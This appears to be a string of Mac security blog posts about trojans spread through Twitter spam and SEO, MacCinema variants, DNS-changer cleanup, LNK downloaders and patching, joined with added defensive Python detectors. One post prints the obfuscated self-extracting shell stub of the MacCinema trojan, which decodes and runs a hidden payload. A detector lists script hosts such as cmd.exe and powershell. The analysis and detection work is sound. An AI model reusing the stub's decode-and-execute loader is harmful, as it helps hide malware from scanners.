I love reading emails especially when with background =)

If you just double-click it, you are not infected. However, if you follow and successfully finish the installation process, then you are definitely infected!
I just read my RSS feeds and found an interesting write-up from Peter @ Intego about “Hacking twitter spread Mac malware“.
In the past, we have seen bogus blog profiles, such as on Blogspot, massively created to distribute FakeCodec malware for both the Windows and Macintosh platforms. To reach more internet users, these bogus profiles are spammed in various legitimate online communities and on social networking walls, and analytics are used to poison Google search results. This has been a very effective distribution vector for these attackers, even up to this time. An example is celebnudestars.net, which receives thousands of visits daily.
Now the social networking craze has led to a new dimension, as this year micro-blogging sinks in with a dramatic increase in popularity. I discussed this in my previous blog post “The Allure of Social Networking“.
Micro-blogging, most popularly Twitter, is now a huge target. Similar to blogs, attackers have started to auto-generate bogus profiles to carry out malicious tasks.
Early this month, Dancho Danchev published his findings on the ZDNet blog, titled “Cybercriminals hijack Twitter trending topics to serve malware”, listing keywords that lead to these bogus profiles, which in turn link to fake codec malware servers.
Malicious users may take advantage of popular trends, as in the screenshot below (source: http://www.stoptwitterspam.com)

In a nutshell, it is evident that these organized groups already have resources deployed and actively operating; now it is only a matter of time before we see Mac malware served through this vector.
It is important that users practice safe computing by applying security updates and making sure security scanners and tools are turned on.
Apple updated its web pages as Snow Leopard is expected to be released this September.
A notable change is in the Security section, where Apple admits that “no system can be 100 percent immune from every threat” and acknowledges that “antivirus software may offer additional protection”.

Interestingly, prior to this change there was a strong campaign that every “Mac is Secure”. (Thank goodness I kept a copy of those pages, because I noted and referenced a link in my abstract here.)

If you recall this page from last year (below): it caught massive media attention, as Apple recommended antivirus, which was contrary to its security campaign. The attention escalated further when Apple removed the page and said it was “inaccurate”, meaning that it was old and not updated. (Google “Apple removes anti-virus” for the full story.)
What I think users should understand here is that “Security is a Process and NOT a Product”. Evidently, gaining popularity brings both worlds, good and bad. Obviously, users who store confidential information on their hard drives and perform financial transactions online must understand that it is their responsibility to protect themselves from outside threats, especially with the growing number of organized cyber-crimes.

This has been discussed here, and the graph was added at http://secviz.org/
Last week, I spotted a modified version of MacCinema. The change was not significant; the modification was purely to avoid detection by scanners.
The script looks like this:
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
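The stub above is a self-extracting installer: it reads its own file (`$0`), swaps a disguised token for the reversed word “begin”, reverses every line character by character and then the line order, and only then feeds the result to uudecode, so a plain signature on the payload never sees the uuencoded text. The following is an added example, not code from the original post: a Python triage script that scores a shell script on those structural traits rather than on the payload. The two sample scripts embedded in it are constructed (the suspect one reproduces the shape of the stub with the payload omitted), and the indicator names are my own.

```python
import re

# Constructed reproduction of the stub's shape (own-file read, reversed lines,
# hidden "begin" marker, run-then-delete). The uuencoded payload is omitted.
SUSPECT_SCRIPT = r"""#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
agazagiz 666 lala
"""

# Constructed ordinary installer with none of those traits.
BENIGN_SCRIPT = r"""#!/bin/sh
set -e
cp build/player /usr/local/bin/player
chmod 755 /usr/local/bin/player
"""

INDICATORS = {
    # the script reads its own file: the payload is appended after the code
    "reads_own_file": re.compile(r"\b(?:tail|head|sed)\b[^|\n]*\$0\b"),
    # uudecode fed from a pipe instead of a named file
    "uudecode_pipe": re.compile(r"\|\s*uudecode\b"),
    # per-line character reversal (the sed idiom) or tail -r line-order reversal
    "line_reversal": re.compile(r"\btail\s+-r\b|\bsed\s+'/\\n/!G"),
    # a substitution that manufactures the uuencode "begin" marker at decode time
    "hidden_begin_marker": re.compile(r"s/[^/]+/(?:begin|nigeb)/"),
    # decoded output executed and immediately deleted
    "exec_then_delete": re.compile(r"\bsh\s+`[^`]+`\s*&&\s*rm\s+`[^`]+`"),
}


def scan_script(text):
    """Return the names of the indicators that match, in dictionary order."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def is_self_extracting(text):
    """Flag when the two core traits co-occur, or when three or more traits match."""
    hits = set(scan_script(text))
    return {"reads_own_file", "uudecode_pipe"} <= hits or len(hits) >= 3


if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, scan_script(script), "self-extracting:", is_self_extracting(script))
```

Because the traits are in the stub, not the payload, swapping the substitution tokens or re-encoding the payload (which is all this variant did) does not change the verdict.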
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumble onto these malicious sites from Google search.
Some lure Mac users by promising free downloads of full-version software, cracks, serials, activators, generators, keys and fixes, as in the screenshot below.
…while others link to Mac videos, like the PornTube one below.

There are malware-serving sites that are a bit aggressive: they do not ask the user to download the DMG file; instead it is downloaded and mounted automatically, because this is turned on by default. You can disable automount by following these instructions:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
This instruction has been previously discussed here.
Stay safe!
Option 1 - Click the Apple icon in the upper left corner, click “System Preferences”, then “Network”, and look for “DNS Server”. If you want to modify or remove a malicious entry, you can simply click the box and input the right address. However, if you are not sure, simply try release & renew as instructed below.

Option 2 - Open Terminal (~/Applications/Utilities, or search for it using Spotlight)
From the terminal, type “cat /etc/resolv.conf”. This command returns your domain and name servers.
Another command is “scutil --dns”. Check resolver #1; this often returns the domain and name servers as well.
Release and Renew to remove malicious DNS entry
From the terminal, type the following:
sudo ifconfig en1 down
sudo ifconfig en1 up
**Note: sudo means run as the root user, so it will require you to input your password. Also, en1 is often interfaced to LAN and en0 to Wireless; just try and see which one works.
Another way is to unplug your internet connection and reconnect. This will also work (”,)
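Reading the resolver list is only useful if you know what should be there. The following is an added example, not code from the original post: a small Python audit that pulls the nameserver addresses out of either a resolv.conf file or `scutil --dns` output and labels each one as expected (on an allowlist you supply), local (an RFC 1918 address, typically the home router), or unexpected. Both inputs are constructed samples; the `scutil --dns` layout is my approximation of the output described above, and 203.0.113.7 is a documentation address standing in for a resolver the user never configured.

```python
import ipaddress
import re

# Constructed sample of /etc/resolv.conf, not taken from a real machine.
RESOLV_CONF = """\
domain home.example
nameserver 192.168.1.1
nameserver 203.0.113.7
"""

# Constructed approximation of one resolver block from `scutil --dns`
# (assumed layout: "nameserver[N] : address" lines under "resolver #1").
SCUTIL_DNS = """\
DNS configuration

resolver #1
  search domain[0] : home.example
  nameserver[0] : 192.168.1.1
  nameserver[1] : 203.0.113.7
  if_index : 5 (en1)
"""

# Matches "nameserver 1.2.3.4" (resolv.conf) and "nameserver[0] : 1.2.3.4" (scutil).
NAMESERVER_RE = re.compile(r"^\s*nameserver(?:\[\d+\])?\s*:?\s*(\S+)", re.MULTILINE)

# RFC 1918 ranges; a resolver here is usually the home router rather than an attacker.
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def extract_nameservers(text):
    """Return the resolver addresses in order of appearance, without duplicates."""
    found = []
    for match in NAMESERVER_RE.finditer(text):
        addr = match.group(1)
        if addr not in found:
            found.append(addr)
    return found


def classify(addr, expected):
    """expected: allowlist of resolvers the user or the ISP actually configured."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return "invalid"
    if addr in expected:
        return "expected"
    if ip.is_loopback or any(ip in net for net in LOCAL_NETS):
        return "local"
    return "unexpected"


def audit_resolvers(text, expected):
    """Map every resolver found in text to expected / local / unexpected / invalid."""
    return {addr: classify(addr, expected) for addr in extract_nameservers(text)}


if __name__ == "__main__":
    for source, text in (("resolv.conf", RESOLV_CONF), ("scutil --dns", SCUTIL_DNS)):
        for addr, verdict in audit_resolvers(text, {"192.168.1.1"}).items():
            print(f"{source}: {addr} -> {verdict}")
```

An “unexpected” entry is exactly the case the release & renew step above is meant to clear; rerun the audit afterwards to confirm the entry is gone rather than assuming it.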

Figure 01 – LNK Top Level File Structure
A computer shortcut (shortcut) is a small file containing a target URI or the name of the target program file that the shortcut represents. [wiki]
Microsoft Windows uses .lnk as the filename extension for shortcuts to local files, and .URL for shortcuts to remote files, like web pages.
Thanks to Jesse Hager for creating the specification document. [PDF]
As observed, LNK trojan downloaders take advantage of the command line string to perform malicious activity.
If you haven’t patched yet, then please do.
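To see where that command line string actually lives, the following is an added example, not code from the original post or from the specification: a Python walker over the top-level structure (fixed 76-byte header, optional LinkTargetIDList, optional LinkInfo, then the StringData fields in their fixed order) that pulls out the arguments and applies a simple triage. The sample shortcut it builds is constructed, with `example.invalid` as a placeholder host; the flag names and the triage rules are mine.

```python
import struct
import uuid

# ShellLinkHeader layout constants; the names are my own.
HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in this order, each only when its flag is set.
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_sample_lnk(name, relative_path, arguments):
    """Constructed minimal shortcut: header plus StringData, no IDList or LinkInfo."""
    flags = HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, LNK_CLSID.bytes_le, flags,
        0x20,        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,     # creation / access / write FILETIMEs (unset)
        0, 0, 1,     # FileSize, IconIndex, ShowCommand (SW_SHOWNORMAL)
        0, 0, 0, 0,  # HotKey, Reserved1, Reserved2, Reserved3
    )
    # Each StringData field: CountCharacters (uint16) then the characters, no terminator.
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (name, relative_path, arguments))
    return header + body


def parse_lnk(data):
    """Walk the top-level structure and return LinkFlags plus the StringData fields."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a shell link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a shell link file")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (uint16) followed by IDList
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:  # LinkInfoSize (uint32) counts itself
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    is_unicode = bool(flags & IS_UNICODE)
    result = {"flags": flags}
    for bit, key in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        size = count * 2 if is_unicode else count
        raw = data[off:off + size]
        result[key] = raw.decode("utf-16-le" if is_unicode else "cp1252")
        off += size
    return result


def lnk_indicators(parsed):
    """Simple triage on the fields a downloader shortcut abuses."""
    target = (parsed.get("relative_path", "") + " " + parsed.get("arguments", "")).lower()
    reasons = []
    if "http://" in target or "https://" in target:
        reasons.append("contains_url")
    if any(s in target for s in ("cmd.exe", "powershell", "wscript", "cscript", "mshta")):
        reasons.append("invokes_script_host")
    if len(parsed.get("arguments", "")) > 200:
        reasons.append("long_arguments")
    return reasons


if __name__ == "__main__":
    sample = build_sample_lnk("Video", "..\\..\\Windows\\System32\\cmd.exe",
                              "/c start http://example.invalid/placeholder")
    parsed = parse_lnk(sample)
    print(parsed, lnk_indicators(parsed))
```

The point for a defender is that the arguments are a plain counted string after the header, so a shortcut that claims to be a video but carries a URL in its command line is detectable without executing anything.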

How do I know if I’m patched?
Click “About This Mac” and it should display Mac OS X version 10.5.7. You can do the same in Safari by clicking “About Safari”; this should display Safari 4 (beta).
Why is it important to patch?
There are critical vulnerabilities that could allow a malicious user (hacker, malware) to snoop on and steal your information in the background. Let me cite examples of vulnerabilities that have captured media attention (which means many attackers are aware of them).
Safari RSS
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.6, Mac OS X Server v10.5.6
Solution: The critical issue has been addressed in Security Update 2009-001 for Mac users and Safari 3.2.2 for Windows.
Impact: Accessing a maliciously crafted feed: URL may lead to arbitrary code execution.
An attacker can easily craft such a URL and execute JavaScript, and this could expose your personal and sensitive information.

Disk Images
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6
Solution: The critical issue has been addressed in Security Update 2009-002
Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution.
This is very critical given that browsers like Safari have “Open safe files after downloading” enabled by default. You can turn off this option in Safari by following the instructions below:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences

A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once you execute it, it still displays the MacCinema installer. However, a few modifications were found in the preinstall & preupgrade scripts, as shown in Figure 01.
Obviously, attackers are trying to maximize these threats. The obfuscated data extracts another script, which we have already seen in the previous variant.

This Trojan has been in the wild for months now, and as it continues to proliferate on the internet, new Macintosh users are often found falling for its tricks.
Stay away from this threat!
Apple profiles a series of companies that use Macs, and one of them is Twitter; the profile is titled “Twitter. Triumph of humanity“.
It’s a nice story, although when you think of the recent series of successful attacks (the Mikeyy worm and the exposure of the Twitter Admin Panel), you’ll probably react this way …
“Aha?!, Interesting!”